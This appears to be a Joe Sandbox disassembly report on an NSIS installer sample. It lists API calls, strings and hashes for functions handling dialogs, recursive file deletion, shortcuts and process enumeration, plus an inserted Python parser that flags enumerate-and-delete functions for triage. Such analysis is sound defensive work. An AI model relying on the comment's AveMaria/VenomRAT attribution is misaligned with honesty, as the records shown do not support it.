                                                                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $ @$M$N
                                                                                                • API String ID: 1638840714-3479655940
                                                                                                • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                Strings
                                                                                                • ptF, xrefs: 00406D1A
                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                • API String ID: 2035342205-1650287579
                                                                                                • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
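                                                                                                The record above is the one worth pausing on when triaging this first stage: the "Delete: DeleteFile(...)" and "RMDir: RemoveDirectory(...)" strings are the NSIS installer runtime's own log-message formats, and the FindFirstFileW/FindNextFileW walk over "\*.*" followed by DeleteFileW is NSIS's recursive directory removal, so this function belongs to the installer stub rather than to the dropped payloads. The Python below is an added example and not part of the Joe Sandbox report or of Joe Security's tooling: it parses per-function "APIs" records in the layout used on this page (section names, the bullet entries, and the "Part of subcall function" prefix are taken from the page) and flags functions that both enumerate a directory and delete files. The sample input is constructed from lines of this report, with one "Part of subcall function" entry moved into the first record so that the prefix handling is exercised; the enumerate-plus-delete heuristic is my own assumption, not something the report computes.

```python
import re

# Section headers that delimit one function record in the report layout.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One "APIs" entry: "• Name.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR: " when the call is made by a callee.
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$"
)

# Constructed sample: two records copied from this report's layout (the subcall
# line is taken from a different record on the page to exercise the prefix).
SAMPLE = r"""APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• lstrlenW.KERNEL32(?), ref: 00406D58
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Strings
• \*.*, xrefs: 00406D2F
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
"""


def parse_functions(text):
    """Split report text into per-function records (one per 'APIs' header)."""
    functions, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":  # every record opens with its APIs list
                current = {"opcode_id": None, "api_id": None, "apis": [], "strings": []}
                functions.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                current["apis"].append(m.groupdict())  # 'sub' is None for direct calls
        elif section == "Strings":
            # "• text, xrefs: ADDR" -> keep the text only
            current["strings"].append(line[1:].strip().rsplit(", xrefs: ", 1)[0])
        elif section == "Similarity":
            key, _, value = line[1:].strip().partition(": ")
            if key == "Opcode ID":
                current["opcode_id"] = value
            elif key == "API ID":
                current["api_id"] = value
    return functions


# Assumed heuristic: a directory walk and a delete primitive in the same function.
ENUMERATE = {"FindFirstFileW", "FindFirstFileA", "FindNextFileW", "FindNextFileA"}
DELETE = {"DeleteFileW", "DeleteFileA", "RemoveDirectoryW", "RemoveDirectoryA"}


def direct_calls(fn):
    """API names the function calls itself, ignoring 'Part of subcall' entries."""
    return {a["name"] for a in fn["apis"] if a["sub"] is None}


def enumerates_and_deletes(fn):
    names = direct_calls(fn)
    return bool(names & ENUMERATE) and bool(names & DELETE)


def summarize(text):
    """One row per function: identifiers, lowest call site, modules used, flag."""
    rows = []
    for fn in parse_functions(text):
        direct = [a for a in fn["apis"] if a["sub"] is None]
        rows.append({
            "opcode_id": fn["opcode_id"],
            "first_ref": min(a["ref"] for a in direct) if direct else None,
            "api_count": len(fn["apis"]),
            "modules": sorted({a["module"] for a in fn["apis"]}),
            "enumerate_and_delete": enumerates_and_deletes(fn),
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Run against the full report text rather than the sample, the same parser gives a quick way to separate installer-stub functions (file enumeration, dialog messages, NSIS log strings) from the records that matter for the AveMaria/VenomRAT stages, and the Opcode ID carried in each row lets a flagged function be matched across reports.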
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                • String ID: F$A
                                                                                                • API String ID: 3347642858-1281894373
                                                                                                • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                • API String ID: 1916479912-1189179171
                                                                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406A73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 3581403547-1792361021
                                                                                                • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                Strings
                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                • API String ID: 542301482-1377821865
                                                                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
